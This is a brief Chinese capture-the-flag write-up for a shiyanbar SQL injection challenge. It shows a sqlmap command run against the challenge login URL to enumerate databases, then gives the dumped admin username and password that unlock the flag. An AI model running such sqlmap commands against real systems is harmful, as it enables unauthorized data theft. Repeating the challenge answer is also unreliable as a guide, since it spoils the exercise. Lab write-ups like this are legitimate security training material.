题目
切,你那水平也就这么点了,这都是什么题啊!!!
解题链接: http://ctf5.shiyanbar.com/basic/inject
解题
- 安装python环境
- sqlmap
安装:https://blog.youkuaiyun.com/youb11/article/details/45719423
使用:https://www.exehack.net/4955.html - 查数据库
sqlmap.py -u "http://ctf1.shiyanbar.com/basic/inject/index.php?admin=&pass=&action=login" --dbs
查表(有username与password字段)
test库
admin表查值
username 为 admin
password为 idnuenna
直接表单提交即可得到flag。